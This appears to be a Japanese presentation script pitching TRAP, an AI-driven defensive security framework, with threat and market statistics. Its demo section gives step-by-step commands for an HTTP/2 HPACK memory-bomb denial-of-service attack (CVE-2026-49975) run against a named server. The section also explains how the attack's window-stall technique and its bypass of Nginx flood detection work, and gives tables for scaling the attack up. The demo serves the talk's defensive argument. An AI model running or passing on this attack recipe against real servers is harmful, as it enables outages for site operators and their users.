TRAP — AI対AI 自動防御フレームワーク

📌 オープニング（30秒）

皆さん、こんにちは。

今日のセキュリティの主戦場は、「人対人」から「AI 対 AI」へと急速に移行しています。

攻撃者はLLMエージェントを使い、人間では不可能な速度と規模で攻撃を仕掛けてきます。では、防御側はどう戦うべきか？

答え：AIでAIを守る。

本日は、私が提案する TRAP — AI対AI自動防御フレームワーク について、現状の脅威、実証デモ、そして具体的な提案の3本柱でお話しします。

1️⃣ 背景：サイバーセキュリティの現状（1.5分）

🚨 AI攻撃の驚異的な加速

Palo Alto Networks Unit 42の「2026年グローバルインシデント対応レポート」によると：

指標	データ
侵入から窃取までの時間	2024年 4.8時間 → 2025年 1.2時間（4倍加速）
CVE公開後の自動スキャン開始	15分以内
HPACKメモリ増幅率	70:1（後述のデモ参照）

AIは攻撃者のForce Multiplier（力の増幅器） として機能し、偵察・ソーシャルエンジニアリング・スクリプト作成・トラブルシューティングのすべての局面で人的コストを劇的に低下させています。

特に深刻なのは： - AIによるランサムウェアの大規模化 — 展開スクリプト生成・交渉テンプレート・フォールトトレランスをAIが自動化。数百の標的に同時攻撃が可能に - RaaS（Ransomware as a Service）+ AIの融合 — 攻撃の参入障壁が史上最低に

📊 市場の成長

日本サイバーセキュリティ市場は急成長中：

年	市場規模
2024年（実績）	$8.65B
2026年（予測）	$11.13B
2030年（予測）	$18.24B
2034年（予測）	$30.27B（CAGR 13.5%）

%%{init: {"xyChart": {"width": 900, "height": 500}}}%%
xychart-beta
    title "日本サイバーセキュリティ市場 成長予測（2024-2034）"
    x-axis ["2024", "2025", "2026", "2027", "2028", "2029", "2030", "2031", "2032", "2033", "2034"]
    y-axis "USD Billion" 0 --> 35
    bar [8.65, 9.82, 11.13, 12.64, 14.35, 16.29, 18.24, 20.70, 23.50, 26.67, 30.27]
    line [8.65, 9.82, 11.13, 12.64, 14.35, 16.29, 18.24, 20.70, 23.50, 26.67, 30.27]

つまり：脅威は拡大し、市場も拡大している。しかし、既存の防御手段は「人対人」の時代に最適化されたままだ。

ターゲット顧客像（日本市場）

顧客区分	代表的な企業	主要な課題	予算規模
大企業	三菱UFJ、トヨタ、NTT	AI攻撃対策、コンプライアンス、サプライチェーンセキュリティ	年間数億円〜
中堅企業	地方銀行、二次メーカー	セキュリティ人材不足、ランサムウェア対策、DXリスク	年間数千万〜1億円
中小企業	製造下請け、小売、サービス	予算・人材不足、RaaS攻撃の標的化	年間数百万〜数千万円
セキュリティ事業者	NTTデータ、富士通、NEC	自社運用効率化、顧客への新サービス提供	投資案件・PoC重視

2️⃣ DEMO：HTTP/2 Bomb — CVE-2026-49975（2分）

実際の攻撃再現

我々は実在するターゲット portal.gr-east-sys.site に対し、CVE-2026-49975（HTTP/2 HPACK Bomb）を実行しました。

攻撃の流れ

Step 1: ターゲット確認
  $ curl -sI --http2 https://portal.gr-east-sys.site/
  → HTTP/2 200  ✅ 攻撃可能

Step 2: PoC取得
  wget hpack_bomb.py（Python標準ライブラリのみ、ゼロ依存）

Step 3: 攻撃実行
  python3 hpack_bomb.py --host portal.gr-east-sys.site --port 443 \
      -n 5 --streams 128 --headers 32000 --hold 60

攻撃の仕組み — 3つのメカニズムの連鎖

① HPACK インデックス参照爆弾（70:1 メモリ増幅）

クライアント送信:  1 バイト（インデックス 0xBE）
サーバー消費:     ≈ 59 バイト/参照

各ストリーム:  33 KB 送信 → 2.2 MB サーバーメモリ
各接続:        4 MB 送信  → 284 MB サーバーメモリ
増幅率:        約 70:1 🎯

Nginxのコード上、large_client_header_buffers（デフォルト32KB）の制限はあるものの、1バイトのname + 0バイトのvalueのヘッダーはクオータを1バイトしか消費しない → 1ストリームあたり32,000個のヘッダーを仕込める。

② ウィンドウ阻塞（Window Stall）

クライアント → SETTINGS(INITIAL_WINDOW_SIZE=0)
            → サーバーのsend_window = 0 → DATAフレーム送信不可
            → 応答がバッファに滞留 → send_timeout（60s）カウントダウン
            → 50秒ごとに1バイトのWINDOW_UPDATEを送信
            → サーバーが1バイト応答 → send_timeoutリセット
            → 延々とループ

たった150バイトの404ページで、2.3時間もの間サーバーを占有可能。

③ Nginx Flood検知のバイパス

Nginxの洪水検知ロジック：

if (h2c->total_bytes / 8 > h2c->payload_bytes + 1048576) → 切断

HPACK爆弾のトラフィックはほぼすべて正当なヘッダーペイロードであり、オーバーヘッド比は 1.001:1。8:1の閾値をはるかに下回るため、検知を完全にすり抜けます。

攻撃結果

攻撃前:  curl → HTTP/2 200 ✅  正常応答
攻撃中:  アップロード約20MB（5接続 × 128ストリーム × 33KB）
         サーバーメモリが一瞬で約1.4GBに膨張
攻撃後:  curl → 全タイムアウト ❌  サーバー沈没
1分後:   依然応答なし → OOM killer / VMフリーズ
復旧:    クラウドコンソールでVM強制再起動

たった5接続、20MBのアップロード、20秒でサーバー1台を完全にダウンさせました。

規模別のインパクト

接続数	送信トラフィック	消費サーバーメモリ	効果
1	4 MB	~285 MB	小テスト
5	20 MB	~1.4 GB	今回の実証
15	60 MB	~4.2 GB	4GBワーカーを爆破
50	196 MB	~14 GB	大規模攻撃
120	480 MB	~34 GB	究極形態

一言でまとめると： 家庭用ブロードバンド5本分の帯域、20MBの送信トラフィック、20秒でサーバー1台を沈没させる — すべてHPACKの70倍メモリ増幅のおかげ。しかもNginx自身はこれを検知できない。

3️⃣ 提案：TRAPフレームワーク（2.5分）

TRAPとは？

文字	意味	ひと言
T	Trap（おとり）	存在しない「隠しエンドポイント」を仕込み、AIの探索行動を検出
R	React（即時発火）	接触検知の瞬間、人手を介さず AIが三段階で自動対応
A	Attribute（自律追跡）	反偵察エージェントを派遣、攻撃元・手口・侵入経路を高速特定
P	Protect（可視化・遮断）	不審挙動を可視化・通知・遮断し、攻撃者に「監視コスト」を課す

ひと言で： 「AIでAIを守る」自動防御フレームワーク

🎯 4つの具体策

① システム診断 — AI駆動の「健康診断」で外部AI攻撃を検出

システム全体に対し、AIによる継続的な脆弱性スキャンを実施。隠しエンドポイント（Trap）と異常検知AIを組み合わせ、人間の監視では見逃されるAI攻撃の兆候をリアルタイムに捕捉。

外部からのAI偵察行動を即座に検知し、早期発見・早期警告
既存SIEM/EDRに依存しない、AIネイティブで軽量
能動的「健康診断」モデルで、脆弱性を先回りして特定

② Agentによる動的脆弱性DB更新 — 全球の最新脅威を自動収集・防御に反映

AI AgentがCVEデータベース、PoCリポジトリ、セキュリティ研究者の公開情報を24時間365日自動巡回。新たな脆弱性が公開された瞬間にデータベースへ取り込み、防御ルールを動的に更新。

CVE公開後15分以内に自動スキャンが始まる現実に対抗
人手による脆弱性トリアージの遅延をゼロに
攻撃手法をリアルタイムでDBに反映し、防御を攻撃の先へ

③ AI攻撃への「おとり捜査」 — 能動的誘引・溯源・反撃

AIハニーポット（テキストベースの認知蜜罐を含む）を戦略的に配置し、攻撃側AIエージェントを誘引。挙動を分析し、攻撃元・手口を特定する。従来の「待ちの防御」から 「攻める防御」 へ転換。

偽のconfigファイル、偽のAPIドキュメント、隠しエンドポイントでAIの探索天性を逆用
攻撃側AIの「発見への恐怖」を利用した心理戦
反偵察エージェントが攻撃者の全操作痕跡（ps, netstat, auditctl）を追跡・記録

④ 動的保護の実現 — T→R→A→P 自律防御サイクル

静的ルールベースの防御を廃し、T→R→A→Pの意思決定ループを完全自動化。脅威の変化に応じて防御戦略をリアルタイムに適応し、自己進化するセキュリティ体系を構築する。

検知（Trap）→ 判断（React）→ 追跡（Attribute）→ 防御（Protect）の完全自動化
攻撃側AIの行動パターンに応じて防御側AIが動的に対抗
防御の「適応速度」で攻撃を凌駕する

差別化ポイント： 既存製品（MindFort/xBow/Pentera/CrowdStrike）は自動修復のみ、高額、または既存SIEM依存。TRAPは国内初のAI対AIセキュリティプラットフォームとして、能動的健康診断＋動的DB＋おとり捜査＋動的保護の4本柱で差別化。

まとめ（30秒）

サイバーセキュリティの主戦場は「人対人」から「AI 対 AI」へ。

本日お伝えしたこと：

	内容
現実	AI攻撃は4倍加速、20MB・20秒でサーバー1台を沈没させる時代
市場	日本市場は2024年$8.65B → 2034年$30.27Bへ3.5倍成長
答え	TRAP — T（おとり）→ R（即時発火）→ A（自律追跡）→ P（動的防御）

AIでAIを守る。それが次世代のセキュリティです。

ご清聴ありがとうございました。

出典：奇安信《2024人工智能安全報告》、Palo Alto Networks Unit 42「2026年グローバルインシデント対応レポート」、Suzu Labs CTF研究、Research and Markets / Fortune Business Insights